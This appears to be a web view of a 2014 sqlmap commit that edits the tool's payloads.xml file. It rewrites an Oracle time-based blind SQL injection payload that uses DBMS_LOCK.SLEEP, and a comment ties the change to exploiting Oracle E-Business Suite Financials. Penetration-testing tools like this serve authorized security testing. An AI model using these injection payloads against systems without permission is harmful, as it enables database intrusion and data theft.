sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-11-04 09:57:38 +03:00
Code Issues Packages Projects Releases Wiki Activity

minor fix

Browse Source
This commit is contained in:
Bernardo Damele 2014-04-09 12:29:52 +00:00
parent a5aa1c2f94
commit 42bde5328d
1 changed files with 3 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
xml/payloads.xml
View File

@ -3324,6 +3324,7 @@ Formats:
</details>
</test>
<!-- Without parentesis because it never works with them, useful to exploit SQL injection in Oracle E-Business Suite Financials -->
<test>
<title>Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)</title>
<stype>5</stype>
@ -3331,9 +3332,9 @@ Formats:
<risk>0</risk>
<clause>1,3</clause>
<where>3</where>
<vector>(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE [RANDNUM]; END IF; END)</vector>
<vector>BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
<request>
<payload>(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE [RANDNUM]; END IF; END)</payload>
<payload>BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</payload>
</request>
<response>
<time>[SLEEPTIME]</time>